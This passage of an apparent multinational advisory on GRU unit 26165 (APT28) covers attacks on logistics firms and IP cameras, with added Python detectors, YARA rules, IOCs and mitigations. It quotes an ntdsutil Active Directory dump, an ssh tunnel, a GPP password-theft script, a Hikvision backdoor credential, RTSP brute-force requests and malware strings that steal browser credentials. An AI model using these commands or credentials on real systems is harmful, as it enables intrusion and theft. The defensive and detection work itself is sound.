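2024-07-02T09:31:00Z host=WS17 user=CORP\\jdoe cmd=schtasks /create /xml C:\\Users\\jdoe\\AppData\\Local\\Temp\\task.xml /tn Updater
2024-07-02T09:40:27Z host=FS02 user=CORP\\svc_backup cmd=C:\\ProgramData\\ssh.exe -Nf backup@203.0.113.10
2024-07-02T09:42:05Z host=FS02 user=CORP\\svc_backup cmd=python.exe Get-GPPPassword.py corp.local/jdoe
2024-07-02T10:02:13Z host=WS03 user=CORP\\asmith cmd=notepad.exe C:\\Users\\asmith\\notes.txt
"""

EVENT_RE = re.compile(r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+cmd=(?P<cmd>.*)$")

# (tag, pattern, ATT&CK technique as cited in the advisory). Patterns are
# deliberately tolerant of .exe suffixes, quoting and single/double dashes.
RULES = [
    ("ntdsutil_ifm_dump",
     re.compile(r'ntdsutil(\.exe)?\b.*"?activate instance ntds"?.*\bifm\b.*create full', re.I),
     "T1003.003"),
    ("wevtutil_clear_log", re.compile(r"wevtutil(\.exe)?\s+cl\b", re.I), "T1070.001"),
    ("edge_headless",
     re.compile(r"(msedge|edge)(\.exe)?\b.*--?headless[=-]new\b.*--?disable-gpu", re.I),
     "T1059"),
    ("schtasks_xml_import", re.compile(r"schtasks(\.exe)?\s+/create\b.*\s/xml\b", re.I), "T1053.005"),
    # case-sensitive on purpose: -N (no command) and -f (background) are distinct ssh flags
    ("ssh_background_noshell", re.compile(r"\bssh(\.exe)?\s+(-\w*N\w*f|-\w*f\w*N)\b"), "T1048"),
    ("gpp_password_script", re.compile(r"Get-GPPPassword\.py|ldap-dump\.py", re.I), "T1552.006"),
]


@dataclass
class Finding:
    ts: str
    host: str
    user: str
    tag: str
    technique: str
    cmd: str


def classify_command(cmd: str) -> list[tuple[str, str]]:
    """Return (tag, technique) for every rule the command line matches."""
    return [(tag, technique) for tag, pattern, technique in RULES if pattern.search(cmd)]


def scan_events(text: str) -> list[Finding]:
    """Parse the one-line event format and emit one Finding per matched rule."""
    findings = []
    for line in text.splitlines():
        m = EVENT_RE.match(line)
        if not m:
            continue  # tolerate malformed lines rather than abort the scan
        for tag, technique in classify_command(m["cmd"]):
            findings.append(Finding(m["ts"], m["host"], m["user"], tag, technique, m["cmd"]))
    return findings


def hosts_with_chain(findings: list[Finding],
                     required: tuple[str, ...] = ("ntdsutil_ifm_dump", "wevtutil_clear_log")) -> list[str]:
    """Hosts on which every tag in `required` fired. An NTDS dump followed by
    log clearing on the same host is far stronger evidence than either alone,
    which keeps routine administrative use of these binaries from paging anyone."""
    tags_by_host: dict[str, set[str]] = {}
    for f in findings:
        tags_by_host.setdefault(f.host, set()).add(f.tag)
    return sorted(host for host, tags in tags_by_host.items() if set(required) <= tags)


if __name__ == "__main__":
    results = scan_events(SAMPLE_EVENTS)
    for f in results:
        print(f"{f.ts} {f.host} {f.user} [{f.tag} / {f.technique}] {f.cmd}")
    print("dump-then-clear chain on:", hosts_with_chain(results))
```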
After gaining initial access to the network, the actors pursued further access to accounts with access to sensitive information on shipments, such as train schedules and shipping manifests. These accounts contained information on aid shipments to Ukraine, including: sender, recipient, train/plane/ship numbers, point of departure, destination, container registration numbers, travel route, and cargo contents. In at least one instance, the actors attempted to use voice phishing [T1566.004] to gain access to privileged accounts by impersonating IT staff.

Malware

Unit 26165’s use of malware in this campaign ranged from gaining initial access to establishing persistence and exfiltrating data. In some cases, the attack chain resulted in multiple pieces of malware being deployed in succession. The actors used dynamic link library (DLL) search order hijacking [T1574.001] to facilitate malware execution. Known malware variants tied to this campaign against logistics sector victims include:

- HEADLACE [7]
- MASEPIE [8]

While other malware variants, such as OCEANMAP and STEELHOOK, [8] were not directly observed targeting logistics or IT entities, their deployment against victims in other sectors in Ukraine and other Western countries suggests that they could be deployed against logistics and IT entities should the need arise.

Persistence

In addition to the abovementioned mailbox permissions abuse, unit 26165 actors also used scheduled tasks [T1053.005] and run keys [T1547.001], and placed malicious shortcuts [T1547.009] in the startup folder, to establish persistence.

Exfiltration

GRU unit 26165 actors used a variety of methods for data exfiltration that varied based on the victim environment, including both malware and living off the land binaries. PowerShell commands [T1059.001] were often used to prepare data for exfiltration; for example, the actors prepared zip archives [T1560.001] for upload to their own infrastructure.
The actors also used server data exchange protocols and Application Programming Interfaces (APIs) such as Exchange Web Services (EWS) and Internet Message Access Protocol (IMAP) [T1114.002] to exfiltrate data from email servers. In multiple instances, the actors used periodic EWS queries [T1119] to collect new emails sent and received since the last data exfiltration [T1029]. The actors typically used infrastructure in close geographic proximity to the victim. Long gaps between exfiltration, the use of trusted and legitimate protocols, and the use of local infrastructure allowed long-term collection of sensitive data to go undetected.

Connections to Targeting of IP Cameras

In addition to targeting logistics entities, unit 26165 actors likely used access to private cameras at key locations, such as near border crossings, military installations, and rail stations, to track the movement of materials into Ukraine. The actors also used legitimate municipal services, such as traffic cams.

The actors targeted Real Time Streaming Protocol (RTSP) servers hosting IP cameras, primarily located in Ukraine, as early as March 2022 in a large-scale campaign that included attempts to enumerate devices [T1592] and gain access to the cameras’ feeds [T1125]. Actor-controlled servers sent RTSP DESCRIBE requests destined for RTSP servers, primarily hosting IP cameras [T1090.002]. The DESCRIBE requests were crafted to obtain access to IP cameras located on networks logically distinct from that of the routers that received the request. The requests included Base64-encoded credentials for the RTSP server, which included publicly documented default credentials and likely generic attempts to brute force access to the devices [T1110]. An example of an RTSP request is shown in Figure 3.
Figure 3: Example RTSP request

    DESCRIBE rtsp://[IP ADDRESS] RTSP/1.0
    CSeq: 1
    Authorization: Basic
    User-Agent: WebClient
    Accept: application/sdp

    DESCRIBE rtsp://[IP ADDRESS] RTSP/1.0
    CSeq: 2
    Authorization: Digest username="admin", realm="[a-f0-9]{12}", algorithm="MD5", nonce="[a-f0-9]{32}", uri="", response="[a-f0-9]{32}"
    User-Agent: WebClient
    Accept: application/sdp

Successful RTSP 200 OK responses contained a snapshot of the IP camera's image and IP camera metadata, such as video codec, resolution, and other properties depending on the IP camera's configuration. From a sample available to the authoring agencies of over 10,000 cameras targeted via this effort, the geographic distribution of victims showed a strong focus on cameras in Ukraine and border countries, as shown in Table 1.

Table 1: Geographic distribution of targeted IP cameras

Country | Percentage of Total Attempts
Ukraine | 81.0%
Romania | 9.9%
Poland | 4.0%
Hungary | 2.8%
Slovakia | 1.7%
Others | 0.6%

Mitigation Actions

General Security Mitigations

Architecture and Configuration

- Employ appropriate network segmentation [D3-NI] and restrictions to limit access, and utilize additional attributes (such as device information, environment, and access path) when making access decisions [D3-AMED].
- Consider Zero Trust principles when designing systems. Base product choices on how those products can solve specific risks identified as part of the end-to-end design. [9]
- Ensure that host firewalls and network security appliances (e.g., firewalls) are configured to allow only legitimately needed data flows between devices and servers to prevent lateral movement [D3-ITF]. Alert on attempts to connect laterally between host devices or other unusual data flows.
- Use automated tools to audit access logs for security concerns and identify anomalous access requests [D3-RAPA].
- For organizations using on-premises authentication and email services, block and alert on NTLM/SMB requests to external infrastructure [D3-OTF].
- Utilize endpoint detection and response (EDR) and other cybersecurity solutions on all systems, prioritizing high value systems with large amounts of sensitive data, such as mail servers and domain controllers [D3-PM], first.
- Perform threat and attack modeling to understand how sensitive systems may be compromised within an organization’s specific architecture and security controls. Use this to develop a monitoring strategy to detect compromise attempts and select appropriate products to enact this strategy.
- Collect and monitor Windows logs for certain events, especially events that indicate that a log was cleared unexpectedly [D3-SFA].
- Enable optional security features in Windows to harden endpoints and mitigate initial access techniques [D3-AH]:
  - Enable attack surface reduction rules to prevent executable content from email [D3-ABPI].
  - Enable attack surface reduction rules to prevent execution of files from globally writeable directories, such as Downloads or %APPDATA% [D3-EAL].
  - Unless users are involved in the development of scripts, limit the local execution of scripts (such as batch scripts, VBScript, JScript/JavaScript, and PowerShell [10]) to known scripts [D3-EI], and audit execution attempts. Disable Windows Host Scripting functionality and configure PowerShell to run in Constrained mode [D3-ACH].
  - Where feasible, implement allowlisting for applications and scripts to limit execution to only those needed for authorized activities, blocking all others by default [D3-EAL].
- Consider using open source SIGMA rules as a baseline for detecting and alerting on suspicious file execution or command parameters [D3-PSA].
- Use services that provide enhanced browsing services and safe link checking [D3-URA]. Significant reductions in successful spearphishing attempts were noted when email providers began offering link checking and automatic file detonation to block malicious content.
- Where possible, block logins from public VPNs, including exit nodes in the same country as target systems, or, if they need to be allowed, alert on them for further investigation. Most organizations should not need to allow incoming traffic, especially logins to systems, from VPN services [D3-NAM].
- Educate users to only use approved corporate systems for relevant government and military business and to avoid the use of personal accounts on cloud email providers to conduct official business. Network administrators should also audit both email and web request logs to detect such activity.
- Many organizations may not need to allow outgoing traffic to hosting and API mocking services, which are frequently used by GRU unit 26165. Organizations should consider alerting on or blocking such services, with exceptions allowlisted for legitimate activity [D3-DNSDL].
- Heuristic detections for web requests to new subdomains, including of the above providers, may uncover malicious phishing activity [D3-DNRA]. Logging the requests for each subdomain requested by users on a network, such as in DNS or firewall logs, may enable system administrators to identify new targeting and victims.
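The RTSP DESCRIBE probes described in the IP camera section above (Figure 3) can be triaged from captured requests: decode the Basic credentials, pull the fields out of the Digest response and flag what a defender would alert on. This is an added example, not code from the advisory; the requests are constructed, the default-credential set is a placeholder to replace with the vendor defaults of the cameras actually deployed, and the helper and flag names are assumptions.

```python
import base64
import re
from typing import Optional


def _basic(user: str, password: str) -> str:
    """Build a Basic Authorization value for the constructed samples below."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


# Constructed DESCRIBE requests in the shape of Figure 3; not captured traffic.
# The first carries the Hikvision backdoor string quoted in the IOC section.
SAMPLE_REQUESTS = [
    "DESCRIBE rtsp://192.0.2.10:554/Streaming/Channels/101 RTSP/1.0\r\n"
    "CSeq: 1\r\n"
    "Authorization: Basic YWRtaW46MTEK\r\n"
    "User-Agent: WebClient\r\n"
    "Accept: application/sdp\r\n\r\n",
    "DESCRIBE rtsp://192.0.2.10:554/Streaming/Channels/101 RTSP/1.0\r\n"
    "CSeq: 2\r\n"
    'Authorization: Digest username="admin", realm="0123456789ab", algorithm="MD5", '
    'nonce="00112233445566778899aabbccddeeff", uri="", '
    'response="ffeeddccbbaa99887766554433221100"\r\n'
    "User-Agent: WebClient\r\n"
    "Accept: application/sdp\r\n\r\n",
    "DESCRIBE rtsp://192.0.2.10:554/live RTSP/1.0\r\n"
    "CSeq: 3\r\n"
    "Authorization: " + _basic("operator", "correct-horse-battery") + "\r\n"
    "User-Agent: LibVLC/3.0.20\r\n"
    "Accept: application/sdp\r\n\r\n",
]

# Placeholder set of vendor defaults; replace with the defaults of the camera
# models in your fleet. ("admin", "11") is what the backdoor string decodes to.
DEFAULT_CREDENTIALS = {("admin", "admin"), ("admin", "12345"), ("admin", "11"), ("admin", "")}

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z_]+)\s+(?P<url>\S+)\s+RTSP/(?P<version>\d\.\d)$")
DIGEST_KV = re.compile(r'(\w+)="([^"]*)"')


def parse_request(raw: str) -> dict:
    """Split an RTSP request into method, URL and a lower-cased header map."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    m = REQUEST_LINE.match(lines[0])
    if not m:
        raise ValueError(f"not an RTSP request line: {lines[0]!r}")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": m["method"], "url": m["url"], "headers": headers}


def parse_authorization(value: Optional[str]) -> dict:
    """Decode Basic credentials or pull the fields out of a Digest response."""
    if not value:
        return {"scheme": None}
    scheme, _, rest = value.partition(" ")
    scheme, rest = scheme.lower(), rest.strip()
    if scheme == "basic":
        try:
            decoded = base64.b64decode(rest, validate=True).decode("latin-1")
        except ValueError as exc:  # binascii.Error is a ValueError subclass
            return {"scheme": "basic", "error": str(exc)}
        # Strip a trailing newline: the backdoor string encodes "admin:11\n".
        user, _, password = decoded.rstrip("\r\n").partition(":")
        return {"scheme": "basic", "username": user, "password": password, "raw": rest}
    if scheme == "digest":
        fields = dict(DIGEST_KV.findall(rest))
        return {"scheme": "digest", "username": fields.get("username"), "fields": fields}
    return {"scheme": scheme}


def triage(raw: str) -> dict:
    """Return the request's essentials plus the flags a defender would alert on."""
    req = parse_request(raw)
    auth = parse_authorization(req["headers"].get("authorization"))
    flags = []
    if req["method"] == "DESCRIBE" and req["headers"].get("user-agent", "").lower() == "webclient":
        flags.append("generic_user_agent_webclient")  # the User-Agent seen in Figure 3
    if auth.get("scheme") == "basic" and "error" not in auth:
        if (auth["username"], auth["password"]) in DEFAULT_CREDENTIALS:
            flags.append("default_credentials")
        if auth["raw"] == "YWRtaW46MTEK":  # Hikvision backdoor string from the IOC section
            flags.append("hikvision_backdoor_string")
        flags.append("cleartext_basic_auth")
    elif auth.get("scheme") == "digest":
        if auth["fields"].get("uri") == "":
            flags.append("digest_empty_uri")  # Figure 3 sends uri=""; a conforming client fills it
        if auth["username"] == "admin":
            flags.append("digest_admin_account")
    return {"cseq": req["headers"].get("cseq"), "url": req["url"],
            "scheme": auth.get("scheme"), "username": auth.get("username"), "flags": flags}


if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        print(triage(raw))
```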
Identity and Access Management

Organizations should take measures to ensure strong access controls and mitigate against common credential theft techniques:

- Use MFA with strong factors, such as passkeys or PKI smartcards, and require regular re-authentication [D3-MFA]. [11], [12] Strong authentication factors are not guessable using dictionary techniques, so they resist brute force attempts.
- Implement other mitigations for privileged accounts, including limiting the number of admin accounts, considering hardware MFA tokens, and regularly reviewing all privileged user accounts [D3-JFAPA].
- Separate privileged accounts by role and alert on misuse of privileged accounts [D3-UAP]. For example, email administrator accounts should be different from domain administrator accounts.
- Reduce reliance on passwords; instead, consider using services like single sign-on [D3-TBA].
- For organizations using on-premises authentication and email services, plan to disable NTLM entirely and migrate to more robust authentication processes such as PKI certificate authentication.
- Do not store passwords in Group Policy Preferences (GPP). Remove all passwords previously included in GPP and change all passwords on the corresponding accounts [D3-CH]. [13]
- Use account throttling or account lockout [D3-ANET]:
  - Throttling is preferred to lockout. Throttling progressively increases the time delay between successive login attempts.
  - Account lockout can leave legitimate users unable to access their accounts and requires access to an account recovery process. Account lockout can provide a malicious actor with an easy way to launch a Denial of Service (DoS). If using lockout, then allowing 5 to 10 attempts before lockout is recommended.
- Use a service to check for compromised passwords before using them [D3-SPP]. For example, “Have I Been Pwned” can be used to check whether a password has been previously compromised without disclosing the potential password.
- Change all default credentials [D3-CRO] and disable protocols that use weak authentication (e.g., clear-text passwords or outdated and vulnerable authentication or encryption protocols) or do not support multi-factor authentication [D3-ACH] [D3-ET].
- Always configure access controls carefully to ensure that only well-maintained and well-authenticated accounts have access. [13]

IP Camera Mitigations

The following mitigation techniques for IP cameras can be used to defend against this type of malicious activity:

- Ensure IP cameras are currently supported. Replace devices that are out of support.
- Apply security patches and firmware updates to all IP cameras [D3-SU].
- Disable remote access to the IP camera, if unnecessary [D3-ITF].
- Ensure cameras are protected by a security appliance, if possible, such as by using a firewall to prevent communication with the camera from IP addresses not on an allowlist [D3-NAM].
- If remote access to IP camera feeds is required, ensure authentication is enabled [D3-AA] and use a VPN to connect remotely [D3-ET].
- Use MFA for management accounts if supported [D3-MFA].
- Disable Universal Plug and Play (UPnP), Peer-to-Peer (P2P), and Anonymous Visit features on IP cameras and routers [D3-NI].
- Turn off other ports/services not in use (e.g., FTP, web interface) [D3-ACH].
- If supported, enable authenticated RTSP access only [D3-AA].
- Review all authentication activity for remote access to make sure it is valid and expected [D3-UBA]. Investigate any unexpected or unusual activity.
- Audit IP camera user accounts to ensure they are an accurate reflection of your organization and that they are being used as expected [D3-UAP].
- Configure, tune, and monitor logging, if available, on the IP camera.

Indicators of Compromise (IOCs)

Note: Specific IoCs may no longer be actor controlled, may themselves be compromised infrastructure or email accounts, or may be shared infrastructure such as public VPN or Tor exit nodes.
Care should be taken when triaging logs or developing detection rules based on these indicators. GRU unit 26165 almost certainly uses extensive further infrastructure and TTPs not specifically listed in this report.

Utilities and scripts

Legitimate utilities

Unauthorized or unusual use of the following legitimate utilities can be an indication of a potential compromise:

- ntdsutil – A legitimate Windows executable used by threat actors to export contents of Active Directory
- wevtutil – A legitimate Windows executable used by threat actors to delete event logs
- vssadmin – A legitimate Windows executable possibly used by threat actors to make a copy of the server’s C: drive
- ADexplorer – A legitimate Windows executable to view, edit, and back up Active Directory Certificate Services
- OpenSSH – The Windows version of a legitimate open source SSH client
- schtasks – A legitimate Windows executable used to create persistence using scheduled tasks
- whoami – A legitimate Windows executable used to retrieve the name of the current user
- tasklist – A legitimate Windows executable used to retrieve the list of running processes
- hostname – A legitimate Windows executable used to retrieve the device name
- arp – A legitimate Windows executable used to retrieve the ARP table for mapping the network environment
- systeminfo – A legitimate Windows executable used to retrieve a comprehensive summary of device and operating system information
- net – A legitimate Windows executable used to retrieve detailed user information
- wmic – A legitimate Windows executable used to interact with Windows Management Instrumentation (WMI), such as to retrieve letters assigned to logical partitions on storage drives
- cacls – A legitimate Windows executable used to modify permissions on files
- icacls – A legitimate Windows executable used to modify permissions on files and handle integrity levels and ownership
- ssh – A legitimate Windows executable used to establish network shell connections
- reg – A legitimate Windows executable used to add to or modify the system registry

Note: Additional heuristics are needed for effective hunting for these and other living off the land (LOTL) binaries to avoid being overwhelmed by false positives if these legitimate management tools are used regularly. See the joint guide, Identifying and Mitigating Living Off the Land Techniques, for guidance on developing a multifaceted cybersecurity strategy that enables behavior analytics, anomaly detection, and proactive hunting, which are part of a comprehensive approach to mitigating cyber threats that employ LOTL techniques.

Malicious scripts

- Certipy – An open source Python tool for enumerating and abusing Active Directory Certificate Services
- Get-GPPPassword.py – An open source Python script for finding insecure passwords stored in Group Policy Preferences
- ldap-dump.py – A script for enumerating user accounts and other information in Active Directory
- Hikvision backdoor string: “YWRtaW46MTEK”

Suspicious command lines

While the following utilities are legitimate, and using them with the command lines shown may also be legitimate, these command lines are often used during malicious activities and could be an indication of a compromise:

    edge.exe "-headless-new -disable-gpu"
    ntdsutil.exe "activate instance ntds" ifm "create full C:\temp\[a-z]{3}" quit quit
    ssh -Nf
    schtasks /create /xml

Outlook CVE Exploitation IOCs

Commonly Used Webmail Providers

- portugalmail[.]pt
- mail-online[.]dk
- email[.]cz
- seznam[.]cz

Malicious Archive Filenames Involving CVE-2023-38831

- calc.war.zip
- news_week_6.zip
- Roadmap.zip
- SEDE-PV-2023-10-09-1_EN.zip
- war.zip
- Zeyilname.zip

Brute Forcing IP Addresses

Disclaimer: These IP addresses date from June 2024 through August 2024. The authoring agencies recommend organizations investigate or vet these IP addresses prior to taking action, such as blocking.

Detections

Customized NTLM listener

    rule APT28_NTLM_LISTENER {
        meta:
            description = "Detects NTLM listeners including APT28's custom one"
        strings:
            $command_1 = "start-process powershell.exe -WindowStyle hidden"
            $command_2 = "New-Object System.Net.HttpListener"
            $command_3 = "Prefixes.Add('http://localhost:8080/')"
            $command_4 = "-match 'Authorization'"
            $command_5 = "GetValues('Authorization')"
            $command_6 = "Request.RemoteEndPoint.Address.IPAddressToString"
            $command_7 = "@(0x4e,0x54,0x4c,0x4d, 0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x28,0x00,0x00,0x01,0x82,0x00,0x00,0x11,0x22,0x33,0x44,0x55,0x66,0x77,0x88,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)"
            $command_8 = ".AllKeys"
            $variable_1 = "$NTLMAuthentication" nocase
            $variable_2 = "$NTLMType2" nocase
            $variable_3 = "$listener" nocase
            $variable_4 = "$hostip" nocase
            $variable_5 = "$request" nocase
            $variable_6 = "$ntlmt2" nocase
            $variable_7 = "$NTLMType2Response" nocase
            $variable_8 = "$buffer" nocase
        condition:
            5 of ($command_*) or all of ($variable_*)
    }

HEADLACE shortcut

    rule APT28_HEADLACE_SHORTCUT {
        meta:
            description = "Detects the HEADLACE backdoor shortcut dropper. Rule is meant for threat hunting."
        strings:
            $type = "[InternetShortcut]" ascii nocase
            $url = "file://"
            $edge = "msedge.exe"
            $icon = "IconFile"
        condition:
            all of them
    }

HEADLACE credential dialogbox phishing

    rule APT28_HEADLACE_CREDENTIALDIALOG {
        meta:
            description = "Detects scripts used by APT28 to lure user into entering credentials"
        strings:
            $command_1 = "while($true)"
            $command_2 = "Get-Credential $(whoami)"
            $command_3 = "Add-Content"
            $command_4 = ".UserName"
            $command_5 = ".GetNetworkCredential().Password"
            $command_6 = "GetNetworkCredential().Password.Length -ne 0"
        condition:
            5 of them
    }

HEADLACE core script

    rule APT28_HEADLACE_CORE {
        meta:
            description = "Detects HEADLACE core batch scripts"
        strings:
            $chcp = "chcp 65001" ascii
            $headless = "start \"\" msedge --headless=new --disable-gpu" ascii
            $command_1 = "taskkill /im msedge.exe /f" ascii
            $command_2 = "whoami>\"%programdata%" ascii
            $command_3 = "timeout" ascii
            $command_4 = "copy \"%programdata%\\" ascii
            $non_generic_del_1 = "del /q /f \"%programdata%" ascii
            $non_generic_del_3 = "del /q /f \"%userprofile%\\Downloads\\" ascii
            $generic_del = "del /q /f" ascii
        condition:
            ( $chcp and $headless ) and ( 1 of ($non_generic_del_*) or ($generic_del) or 3 of ($command_*) )
    }

MASEPIE

    rule APT28_MASEPIE {
        meta:
            description = "Detects MASEPIE python script"
        strings:
            $masepie_unique_1 = "os.popen('whoami').read()"
            $masepie_unique_2 = "elif message == 'check'"
            $masepie_unique_3 = "elif message == 'send_file':"
            $masepie_unique_4 = "elif message == 'get_file'"
            $masepie_unique_5 = "enc_mes('ok'"
            $masepie_unique_6 = "Bad command!'.encode('ascii'"
            $masepie_unique_7 = "{user}{SEPARATOR}{k}"
            $masepie_unique_8 = "raise Exception(\"Reconnect"
        condition:
            3 of ($masepie_unique_*)
    }

STEELHOOK

    rule APT28_STEELHOOK {
        meta:
            description = "Detects APT28's STEELHOOK powershell script"
        strings:
            $s_1 = "$($env:LOCALAPPDATA\\\\Google\\\\Chrome\\\\User Data\\\\Local State)"
            $s_2 = "$($env:LOCALAPPDATA\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data)"
            $s_3 = "$($env:LOCALAPPDATA\\\\Microsoft\\\\Edge\\\\User Data\\\\Local State)"
            $s_4 = "$($env:LOCALAPPDATA\\\\Microsoft\\\\Edge\\\\User Data\\\\Default\\\\Login Data)"
            $s_5 = "os_crypt.encrypted_key"
            $s_6 = "System.Security.Cryptography.DataProtectionScope"
            $s_7 = "[system.security.cryptography.protectdata]::Unprotect"
            $s_8 = "Invoke-RestMethod"
        condition:
            all of them
    }

PSEXEC

    rule GENERIC_PSEXEC {
        meta:
            description = "Detects SysInternals PSEXEC executable"
        strings:
            $sysinternals_1 = "SYSINTERNALS SOFTWARE LICENCE TERMS"
            $sysinternals_2 = "/accepteula"
            $sysinternals_3 = "Software\\Sysinternals"
            $network_1 = "\\\\%s\\IPC$"
            $network_2 = "\\\\%s\\ADMIN$\\%s"
            $network_3 = "\\Device\\LanmanRedirector\\%s\\ipc$"
            $psexec_1 = "PSEXESVC"
            $psexec_2 = "PSEXEC-{}-"
            $psexec_3 = "Copying %s to %s..."
            $psexec_4 = "gPSINFSVC"
        condition:
            ( uint16(0x0) == 0x5a4d ) and ( uint16(uint32(0x3c)) == 0x4550 )
            and filesize < 1024KB
            and ( ( any of ($sysinternals_*) and any of ($psexec_*) ) or ( 2 of ($network_*) and 2 of ($psexec_*) ) )
    }

Cybersecurity Industry Tracking

The cybersecurity industry provides overlapping cyber threat intelligence, IOCs, and mitigation recommendations related to GRU unit 26165 cyber actors.
While not all encompassing, the following are the most notable threat group names related under MITRE ATT&CK G0007 and commonly used within the cybersecurity community:

- APT28 [14]
- Fancy Bear [14]
- Forest Blizzard [14]
- Blue Delta [15]

Note: Cybersecurity companies have different methods of tracking and attributing cyber actors, and this may not be a 1:1 correlation to the U.S. government’s understanding for all activity related to these groupings.

Further Reference

To search for the presence of malicious email messages targeting CVE-2023-23397, network defenders may consider using the script published by Microsoft: https://aka.ms/CVE-2023-23397ScriptDoc

For the Impacket TTP, network defenders may consider using the following publicly available Impacket YARA detection rule: https://github.com/Neo23x0/signature-base/blob/master/yara/gen_impacket_tools.yar

Works Cited

[1] Microsoft. Defending Ukraine: Early Lessons from the Cyber War. 2022. https://blogs.microsoft.com/on-the-issues/2022/06/22/defending-ukraine-early-lessons-from-the-cyber-war/
[2] FBI et al. Russian Cyber Actors Use Compromised Routers to Facilitate Cyber Operations. 2024. https://media.defense.gov/2024/Feb/27/2003400753/-1/-1/0/CSA-Russian-Actors-Use-Routers-Facilitate-Cyber_Operations.PDF
[3] NSA et al. Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. 2021. https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/0/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF
[4] ANSSI. Campagnes d'attaques du mode opératoire APT28 depuis 2021. 2023. https://cert.ssi.gouv.fr/cti/CERTFR-2023-CTI-009/
[5] ANSSI. Targeting and compromise of French entities using the APT28 intrusion set. 2025. https://cert.ssi.gouv.fr/cti/CERTFR-2025-CTI-007/
[6] Polish Cyber Command. Detecting Malicious Activity Against Microsoft Exchange Servers. 2023. https://www.wojsko-polskie.pl/woc/articles/aktualnosci-w/detecting-malicious-activity-against-microsoft-exchange-servers/
[7] IBM. Israel-Hamas Conflict Lures to Deliver Headlace Malware. 2023. https://securityintelligence.com/x-force/itg05-ops-leverage-israel-hamas-conflict-lures-to-deliver-headlace-malware/
[8] CERT-UA. APT28: From Initial Attack to Creating Domain Controller Threats in an Hour. 2023. https://cert.gov.ua/article/6276894
[9] NSA. Embracing a Zero Trust Security Model. 2021. https://media.defense.gov/2021/Feb/25/2002588479/-1/-1/0/CSI_EMBRACING_ZT_SECURITY_MODEL_UOO115131-21.PDF
[10] NSA et al. Keeping PowerShell: Security Measures to Use and Embrace. 2022. https://media.defense.gov/2022/Jun/22/2003021689/-1/-1/0/CSI_KEEPING_POWERSHELL_SECURITY_MEASURES_TO_USE_AND_EMBRACE_20220622.PDF
[11] National Institute of Standards and Technology (NIST). Special Publication 800-63B: Digital Identity Guidelines – Authentication and Lifecycle Management. 2020. https://pages.nist.gov/800-63-3/sp800-63b.html
[12] NSA. Selecting Secure Multi-factor Authentication Solutions. October 16, 2020. https://media.defense.gov/2024/Jul/31/2003515137/-1/-1/0/MULTIFACTOR_AUTHENTICATION_SOLUTIONS_UOO17091520.PDF
[13] NSA and CISA. NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations. 2023. https://media.defense.gov/2023/Oct/05/2003314578/-1/-1/0/JOINT_CSA_TOP_TEN_MISCONFIGURATIONS_TLP-CLEAR.PDF
[14] Department of Justice. Justice Department Conducts Court-Authorized Disruption of Botnet Controlled by the Russian Federation’s Main Intelligence Directorate of the General Staff (GRU). 2024. https://www.justice.gov/archives/opa/pr/justice-department-conducts-court-authorized-disruption-botnet-controlled-russian
[15] Recorded Future. GRU’s BlueDelta Targets Key Networks in Europe with Multi-Phase Espionage Campaigns. 2024. https://go.recordedfuture.com/hubfs/reports/CTA-RU-2024-0530.pdf

Disclaimer of endorsement

The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.

Purpose

This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate threats and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.

Contact

United States organizations

National Security Agency (NSA)
Cybersecurity Report Feedback: CybersecurityReports@nsa.gov
Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov
Media Inquiries / Press Desk: NSA Media Relations: 443-634-0721, MediaRelations@nsa.gov

Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI)
U.S. organizations are encouraged to report suspicious or criminal activity related to information in this advisory to CISA via the agency’s Incident Reporting System, its 24/7 Operations Center (report@cisa.gov or 1-844-Say-CISA), or your local FBI field office. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.
Department of Defense Cyber Crime Center (DC3) Defense Industrial Base Inquiries and Cybersecurity Services: DC3.DCISE@us.af.mil Media Inquiries / Press Desk: DC3.Information@us.af.mil United Kingdom organizations Report significant cyber security incidents to ncsc.gov.uk/report-an-incident (monitored 24/7) Germany organizations Bundesnachrichtendienst (BND): Media Relations / Press Desk: +49 30 20 45 36 30, pressestelle@bnd.bund.de BfV Prevention/Economic Protection Unit: +49 30 18792-3322, wirtschaftsschutz@bfv.bund.de BSI Service-Center: +49 800 274 1000, service-center@bsi.bund.de Czech Republic organizations Security Information Service (BIS): cyber.threats@bis.cz National Cyber and Information Security Agency (NÚKIB): cert.incident@nukib.gov.cz Poland organizations Poland Military Counterintelligence Service (SKW): cyber.int@skw.gov.pl Australian organizations Visit cyber.gov.au or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories. Canadian organizations Report incidents by emailing CCCS at contact@cyber.gc.ca. Estonia organizations Estonian Foreign Intelligence Service (EFIS): info@valisluureamet.ee Estonian National Cyber Security Centre (NCSC-EE): ria@ria.ee French organizations French organizations are encouraged to report suspicious activity or incident related to information found in this advisory by contacting ANSSI/CERT-FR by email at cert-fr@ssi.gouv.fr or by phone at: 3218 or +33 9 70 83 32 18. Appendix A: MITRE ATT&CK tactics and techniques See Table 2 through Table 14 for all the threat actor tactics and techniques referenced in this advisory. Table 2: Reconnaissance Tactic/Technique Title ID Use 